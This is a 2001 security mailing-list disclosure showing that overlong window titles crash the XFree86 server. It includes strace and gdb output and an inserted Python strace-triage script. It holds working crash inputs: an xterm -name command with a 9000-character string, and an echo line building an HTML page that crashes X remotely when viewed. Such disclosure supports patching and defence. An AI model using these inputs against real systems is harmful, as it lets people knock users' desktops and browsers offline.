XFree86 DOS / Buffer overflow local and remote.

From: KF (dotslash@snosoft.com)
Date: 09/23/01


Message-ID: <3BAD957A.4000102@snosoft.com>
Date: Sun, 23 Sep 2001 03:55:38 -0400
From: KF <dotslash@snosoft.com>
To: vuln-dev <vuln-dev@security-focus.com>
Subject: XFree86 DOS / Buffer overflow local and remote.


I gzipped the html attachment because the list rejected the html mime type.
-KF


While playing with the WindowMaker title overflow I noticed the following... I have tested this while running KDE
and while running plain vanilla xwindows with no window manager. The first time I was in WindowMaker and of
course it segfaulted also. This seems to work on Mandrake 8.0 ppc but not on my Mandrake 7.2 i586.

I was trying to exploit the WindowMaker overflow using xterm -name <long string here>. Instead I ended
up crashing X all together.

This is the end of an strace of the WindowMaker wmaker executable with the PID of 2003
upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA: fatal IO error 32 (Broken pipe) or KillClient on X server "localhost:0.0"
[1]+ Done strace -o wmaker.strace -ivfp 2003

Here's the end of the message dumped to my screen when I typed startx from my bash prompt.

(**) Mouse1: Core Pointer
(==) Mouse1: Buttons: 3
(**) Mouse1: Emulate3Buttons, Emulate3Timeout: 50
(II) Keyboard "Keyboard1" handled by legacy driver
(II) XINPUT: Adding extended input device "Mouse1" (type: MOUSE)

Fatal server error:
Caught signal 11. Server aborting

When reporting a problem related to a server crash, please send
the full server output, not just the last messages.
This can be found in the log file "/var/log/XFree86.0.log".
Please report problems to xfree86@xfree86.org.

xinit: connection to X server lost.

The first few lines of the core file lead me to believe I was crashing X rather than wmaker.

strings core
CORE
CORE
/etc/X11/X :0 -auth /root/.Xauthority -deferglyphs 16

I ran gdb on the xterm program to make sure I wasn't overflowing the xterm -name parameter.

(gdb) run -display localhost:0 -name `perl -e 'print "A" x 9000'`
Starting program: /usr/X11R6/bin/xterm -display localhost:0 -name `perl -e 'print "A" x 9000'`
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program exited normally.

As you can see, it exited normally. From the strace below we can see that /etc/X11/X segfaults for some reason.

2760 [0fe987d8] read(14, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 6316) = 6316
2760 [0fe987d8] read(14, "8A\0\4\0\340\0\273\0\10\0\0\0\0\0\0008A\0\4\0\340\0\340"..., 9088) = 2064
2760 [0fe71514] gettimeofday({1001226845, 554528}, NULL) = 0
2760 [0fe71514] gettimeofday({1001226845, 556127}, NULL) = 0
2760 [10162b24] --- SIGSEGV (Segmentation fault) ---
2760 [0fe091b0] rt_sigaction(SIGSEGV, {SIG_IGN}, {0x1003d664, [SEGV], SA_RESTART}, 8) = 0
2760 [0fe091b0] --- SIGALRM (Alarm clock) ---
2760 [0fe987e8] write(2, "\nFatal server error:\n", 21) = 21
2760 [0fe987e8] write(0, "\nFatal server error:\n", 21) = 21
2760 [0fe987e8] write(2, "Caught signal 11. Server aborti"..., 35) = 35
2760 [0fe987e8] write(0, "Caught signal 11. Server aborti"..., 35) = 35
2760 [0fe987e8] write(2, "\n", 1) = 1
2760 [0fe987e8] write(0, "\n", 1) = 1
2760 [0fe987e8] write(2, "\nWhen reporting a problem relate"..., 117) = 117
2760 [0fe987e8] write(0, "\nWhen reporting a problem relate"..., 117) = 117
2760 [0fe987e8] write(2, "This can be found in the log fil"..., 60) = 60
2760 [0fe987e8] write(0, "This can be found in the log fil"..., 60) = 60
2760 [0fe987e8] write(2, "Please report problems to xfree8"..., 47) = 47
2760 [0fe987e8] write(0, "Please report problems to xfree8"..., 47) = 47
2760 [0fe987e8] write(2, "\n", 1) = 1
2760 [0fe987e8] write(0, "\n", 1) = 1
2760 [0fe9a008] unlink("/tmp/.X0-lock") = 0
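One way to triage a trace like the one above is to correlate the fatal signal with the read() calls that immediately precede it on the same descriptor. The following is an added example (not part of the original post); it parses the `strace -i` line format shown above, using the quoted lines as a constructed sample, and reports the faulting address plus the preceding reads, flagging any whose preview is a single repeated byte.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: the tail of the X server strace quoted in the post (PID 2760).
STRACE_SAMPLE = r"""
2760 [0fe987d8] read(14, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 6316) = 6316
2760 [0fe987d8] read(14, "8A\0\4\0\340\0\273\0\10\0\0\0\0\0\0008A\0\4\0\340\0\340"..., 9088) = 2064
2760 [0fe71514] gettimeofday({1001226845, 554528}, NULL) = 0
2760 [0fe71514] gettimeofday({1001226845, 556127}, NULL) = 0
2760 [10162b24] --- SIGSEGV (Segmentation fault) ---
2760 [0fe091b0] rt_sigaction(SIGSEGV, {SIG_IGN}, {0x1003d664, [SEGV], SA_RESTART}, 8) = 0
"""

# strace -i prefixes each line with "[address]" of the instruction that made the call.
READ_RE = re.compile(
    r'^(?P<pid>\d+) \[(?P<pc>[0-9a-f]+)\] read\((?P<fd>\d+), "(?P<data>.*?)"'
    r'(?P<trunc>\.\.\.)?, (?P<req>\d+)\) = (?P<ret>-?\d+)$')
SIG_RE = re.compile(r'^(?P<pid>\d+) \[(?P<pc>[0-9a-f]+)\] --- (?P<sig>SIG[A-Z]+) \([^)]*\) ---$')

@dataclass
class Triage:
    pid: int
    signal: str
    pc: str                 # address the process was at when the signal arrived
    reads: list = field(default_factory=list)  # preceding read()s on the same fd, oldest first

    def bytes_before_fault(self) -> int:
        return sum(r["ret"] for r in self.reads)

def triage_strace(text: str, keep: int = 2) -> Optional[Triage]:
    """First fatal signal in the log plus the last `keep` read()s on the fd read most recently."""
    recent = []
    for line in text.splitlines():
        m = READ_RE.match(line)
        if m:
            recent.append({
                "fd": int(m["fd"]), "ret": int(m["ret"]), "requested": int(m["req"]),
                "preview": m["data"], "truncated": m["trunc"] is not None,
                # a preview made of one repeated byte is the classic sign of an oversized filler string
                "filler": len(m["data"]) >= 16 and len(set(m["data"])) == 1,
            })
            continue
        s = SIG_RE.match(line)
        if s and s["sig"] in ("SIGSEGV", "SIGBUS", "SIGABRT"):
            fd = recent[-1]["fd"] if recent else None
            return Triage(int(s["pid"]), s["sig"], s["pc"], [r for r in recent if r["fd"] == fd][-keep:])
    return None
```

On the sample this pairs the SIGSEGV at 10162b24 with 8380 bytes read from fd 14, the first 6316 of them flagged as filler.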

The following seemed to do the trick when viewed with netscape... I had to click the x in the corner of the window
to exit netscape before it crashed...either that or it just took a sec.

echo "<HEAD><TITLE>"`perl -e 'print "A" x 9000'`"</TITLE></HEAD>" > file.html

Since you can put this html on any web page I suppose that makes this issue remote also.

-KF